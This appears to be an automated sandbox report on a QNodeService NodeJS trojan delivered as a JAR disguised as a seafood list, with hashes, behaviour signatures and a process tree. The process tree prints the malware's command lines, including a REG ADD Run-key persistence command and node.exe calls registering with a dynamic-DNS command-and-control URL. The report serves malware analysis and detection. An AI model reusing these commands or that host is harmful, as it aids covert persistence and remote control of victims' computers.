Analysis
-
max time kernel
131s -
max time network
151s -
platform
windows10_x64 -
resource
win10 -
submitted
22-07-2020 09:36
Static task
static1
Behavioral task
behavioral1
Sample
frozen Fish, Shirmp,Pacific mackerel,Sardine,Round scad,lllex Squidetc.jar
Resource
win7
Behavioral task
behavioral2
Sample
frozen Fish, Shirmp,Pacific mackerel,Sardine,Round scad,lllex Squidetc.jar
Resource
win10
General
-
Target
frozen Fish, Shirmp,Pacific mackerel,Sardine,Round scad,lllex Squidetc.jar
-
Size
12KB
-
MD5
4420ae767b10155e152a90ea65cc661e
-
SHA1
2a9878979c046b48b8d19c051a9b09295baa604b
-
SHA256
c79fac5b4dac72d91fca7d4b8ac2c6a01182f785765135b7a237530cdc6cbffa
-
SHA512
911e067cffd455d5ad35225957c3cc2a3931ed389fe949a8c2a1041dfe98a3c71d08e4c1677624af89fd3120b37074f045372ada9ba5e19bf866b6800f179611
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3104 wrote to memory of 572 3104 java.exe 68 PID 3104 wrote to memory of 572 3104 java.exe 68 PID 572 wrote to memory of 1012 572 node.exe 69 PID 572 wrote to memory of 1012 572 node.exe 69 PID 1012 wrote to memory of 952 1012 cmd.exe 70 PID 1012 wrote to memory of 952 1012 cmd.exe 70 PID 572 wrote to memory of 1188 572 node.exe 71 PID 572 wrote to memory of 1188 572 node.exe 71 -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-67922880 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-67922880.cmd\"" reg.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 wtfismyip.com 13 wtfismyip.com -
Executes dropped EXE 2 IoCs
pid Process 572 node.exe 1188 node.exe -
Loads dropped DLL 4 IoCs
pid Process 1188 node.exe 1188 node.exe 1188 node.exe 1188 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1188 node.exe 1188 node.exe -
JavaScript code in executable 2 IoCs
resource yara_rule behavioral2/files/0x000100000001adaa-115.dat js behavioral2/files/0x000100000001adaa-122.dat js -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfeb-118.dat family_qnodeservice
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\frozen Fish, Shirmp,Pacific mackerel,Sardine,Round scad,lllex Squidetc.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://baram11775.dyn.home-webserver.de2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:572 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-67922880" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-67922880.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-67922880" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-67922880.cmd\""4⤵
- Adds Run key to start application
PID:952
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://baram11775.dyn.home-webserver.de3⤵
- Checks processor information in registry
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1188
-
-